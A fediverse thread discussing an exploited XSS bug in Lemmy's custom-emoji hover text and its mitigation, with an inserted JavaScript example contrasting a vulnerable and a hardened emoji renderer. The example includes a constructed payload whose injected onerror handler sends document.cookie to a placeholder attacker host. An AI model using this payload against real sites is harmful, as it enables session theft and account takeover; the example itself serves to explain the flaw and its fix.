losttourist, (edited)
@losttourist@social.chatty.monster avatar

Edit: there is now a mitigation available. It should be safe to use Lemmy again as long as your instance has applied the fix.

https://lemmy.world/post/1293336

Yep, it looks like there is an XSS vulnerability with Lemmy that has been widely exploited, allowing the attackers to steal cookie credentials including potentially those of the site admins.

Some other non-compromised Lemmy instances have taken themselves offline until a fix is available.

Kbin is not affected as far as I can see.

If you have a Lemmy account, don't use it at the moment!

lispi314,
@lispi314@mastodon.top avatar

@losttourist Yet another reason to not enable JavaScript support and to not require it in any program.

zzt,
@zzt@mas.to avatar

@losttourist mind quoting the mitigation here? given the chatter on GitHub I’m a bit paranoid that the issue hasn’t been fixed completely, but lemmy.world seems to be the only source for the mitigation

losttourist,
@losttourist@social.chatty.monster avatar

@zzt That lemmy.world post with instructions to admins to delete custom emojis is all I have.

As far as I understand it, the XSS vuln was in the hover text for custom emojis, so presumably no custom emojis = no dodgy scripts.

But that's all I have. Note that I'm not a Lemmy developer, admin or even a Lemmy user - just a concerned & interested fediverse citizen trying to help keep people safe.
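To make the mechanism in the post above concrete: the added example below is not Lemmy's code and does not reproduce the actual Lemmy bug; it is an illustration of the general pattern of an admin-supplied hover text being pasted into an HTML attribute unescaped, next to a hardened renderer. The emoji object, the function names, and the attacker URL are all constructed for the example.

```javascript
// Added illustration (not Lemmy's code): how an unescaped custom-emoji hover
// text becomes an attribute-injection XSS, and what the hardened renderer
// looks like. All data and names below are constructed for this example.

// Hypothetical vulnerable renderer: the hover text goes straight into the
// title attribute. A double quote in it ends the attribute, and whatever
// follows is parsed as further attributes (such as an onerror handler).
function renderEmojiVulnerable(emoji) {
  return `<img class="emoji" src="${emoji.imageUrl}" alt="${emoji.shortcode}" title="${emoji.altText}">`;
}

// Minimal escaper for text content and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Only accept http(s) image URLs, so javascript: and data: schemes are dropped.
function safeImageUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return "";
  }
  return parsed.protocol === "https:" || parsed.protocol === "http:" ? parsed.href : "";
}

// Hardened renderer: every untrusted value is escaped for attribute context
// and the image URL is scheme-checked before it is interpolated.
function renderEmojiHardened(emoji) {
  const src = escapeHtml(safeImageUrl(emoji.imageUrl));
  return `<img class="emoji" src="${src}" alt="${escapeHtml(emoji.shortcode)}" title="${escapeHtml(emoji.altText)}">`;
}

// Tiny parser for a single start tag with double-quoted attributes: returns
// the attribute names a browser would see. Enough to show which attributes
// each renderer produces; not a general HTML parser.
function attributeNames(tag) {
  const names = [];
  const re = /([a-zA-Z-]+)="[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Constructed malicious emoji: the hover text closes the title attribute and
// adds an onerror handler that would run in every viewer's browser and post
// their cookies to an attacker-controlled host (a placeholder domain here).
const maliciousEmoji = {
  shortcode: "evil",
  imageUrl: "https://example.invalid/nonexistent.png",
  altText: '" onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)',
};

console.log("vulnerable:", renderEmojiVulnerable(maliciousEmoji));
console.log("  attrs:", attributeNames(renderEmojiVulnerable(maliciousEmoji)));
console.log("hardened:  ", renderEmojiHardened(maliciousEmoji));
console.log("  attrs:", attributeNames(renderEmojiHardened(maliciousEmoji)));
```

Run with `node` and compare the two attribute lists: the vulnerable markup carries an `onerror` attribute the admin never intended, the hardened markup carries only the four attributes the template defines. Deleting the emojis, as the lemmy.world post advises, removes the injected attribute values but not the rendering bug, which is why the output-side escaping is the real fix. A session cookie flagged HttpOnly would have blunted the `document.cookie` exfiltration specifically, but injected script can still act as the logged-in user through the site's own API, so it is a mitigation, not a substitute for escaping.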

zzt,
@zzt@mas.to avatar

@losttourist makes sense! I appreciate you doing this — outreach and messaging from lemmy’s devs hasn’t been ideal

PhilipKing,
@PhilipKing@mastodon.social avatar

@losttourist Probably too early to speculate but I wonder who is behind it?

losttourist,
@losttourist@social.chatty.monster avatar

@PhilipKing No idea, but apparently after gaining access to an admin's account on lemmy.world they defaced the site with porn and racist slogans. So probably just script kiddies rather than anything more organised.
